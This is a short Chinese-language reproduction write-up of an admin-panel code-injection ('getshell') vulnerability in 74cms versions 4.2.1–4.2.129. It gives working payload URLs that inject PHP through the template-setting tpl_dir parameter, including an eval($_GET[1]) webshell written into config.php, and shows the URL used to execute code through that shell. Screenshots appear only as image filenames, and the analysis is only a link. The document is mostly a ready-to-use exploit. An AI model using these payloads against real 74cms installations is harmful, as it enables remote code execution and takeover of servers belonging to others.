74cms v4.2.1-v4.2.129-后台getshell漏洞复现

0x00 影响范围

v4.2.1-v4.2.129

0x01 环境搭建

  1. 先去官网下载 骑士人才系统基础版(安装包)

2.将下载好的包进行安装

1.png

0x02 复现过程

当前版本v4.2.111

2.png

点加工具,点击风格模板

3.png

1
2
3
4
5
Payload:
http://127.0.0.1/74cms/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',phpinfo(),'

shell地址:
http://127.0.0.1/74cms/Application/Home/Conf/config.php

直接访问

5.png

后端代码

1575872777895617.png

GETSHELL

http://127.0.0.1/74cms/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',eval($_GET[1]),'

1575872777204019.png

后端代码

1575872777494094.png

http://127.0.0.1/74cms/Application/Home/Conf/config.php?1=phpinfo();

1575872777724008.png)1575872777830410.png

0x03 漏洞分析

请移步http://www.xinziyou123.com/%e6%96%b0%e7%89%8874cms-v4-2-1-v4-2-129-%e5%90%8e%e5%8f%b0getshell%e6%bc%8f%e6%b4%9e/